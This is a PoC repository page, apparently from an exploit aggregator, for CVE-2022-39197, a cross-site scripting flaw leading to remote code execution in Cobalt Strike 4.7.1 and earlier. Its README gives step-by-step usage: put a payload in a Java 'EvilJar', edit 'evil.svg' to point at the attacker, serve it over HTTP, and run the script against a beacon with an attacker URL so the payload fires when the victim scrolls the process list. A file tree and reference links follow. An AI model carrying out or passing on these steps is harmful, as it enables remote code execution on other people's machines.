CVE-2022-39197 PoC — HelpSystems Cobalt Strike 跨站脚本漏洞

Source

Associated Vulnerability

Description

CobaltStrike <= 4.7.1 RCE

Readme

# **CVE-2022-39197 RCE POC**

### Usage

- **Prepare Payload**
1. Edit `Line 19` with your payload in `EvilJar/src/main/java/Exploit.java`
2. Build using jar `mvn clean compile assembly:single`
3. Move `EvilJar-1.0-jar-with-dependencies.jar` from `EvilJar/target/` to `serve/` folder
4. Edit `serve\evil.svg` replace `[attacker]` 
5. Serve using `python3 -m http.server 8080`

- **Execute Exploit**

```
python3 cve-2022-39197.py beacon.exe http://10.10.10.2:8080/evil.svg
```

Payload will be triggered as soon as the user scrolls through Process List

### POC.JPG?
![1.jpg](./images/1.jpg)


### Reference Links

[https://mp.weixin.qq.com/s/Eb0pQ-1ebLSKPUFC7zS6dg](https://mp.weixin.qq.com/s/Eb0pQ-1ebLSKPUFC7zS6dg) — There’s a great in depth analysis of this vulnerability
[https://www.agarri.fr/blog/archives/2012/05/11/svg_files_and_java_code_execution/index.html](https://www.agarri.fr/blog/archives/2012/05/11/svg_files_and_java_code_execution/index.html)

File Snapshot

 [4.0K]  /data/pocs/a77db82ffc730cd0e4eb69889fb984d4e0efcd37
├── [1.5K]  cve-2022-39197.py
├── [4.0K]  EvilJar
│   ├── [4.0K]  META-INF
│   │   └── [  50]  MANIFEST.MF
│   ├── [1.9K]  pom.xml
│   └── [4.0K]  src
│       └── [4.0K]  main
│           └── [4.0K]  java
│               └── [1.2K]  Exploit.java
├── [4.0K]  images
│   └── [144K]  1.jpg
├── [ 966]  README.md
├── [  11]  requirements.txt
└── [4.0K]  serve
    └── [ 243]  evil.svg

7 directories, 8 files

Remarks